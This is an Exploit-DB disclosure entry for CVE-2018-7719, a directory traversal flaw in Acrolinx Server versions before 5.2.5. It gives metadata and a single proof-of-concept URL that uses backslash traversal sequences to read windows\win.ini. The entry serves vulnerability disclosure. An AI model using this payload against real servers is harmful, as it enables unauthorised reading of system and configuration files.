Acrolinx Server < 5.2.5 - Directory Traversal

EDB-ID: 44345
Author: Berk Dusunur
Published: 2018-03-26
CVE: CVE-2018-7719
Type: Remote
Platform: Windows
Vulnerable App: N/A 

 # CVE: CVE 2018-7719 
 # Date: 19.02.2017 
 # Exploit Author: Berk Dusunur 
 # Vendor Homepage: www.acrolinx.com 
 # Version:Before 5.2.5 
  
 PoC 
  
 Acrolinx dashboard windows works on the server. 
  
  
 http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini 
  
 http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html

Source: www.exploit-db.com
Related Posts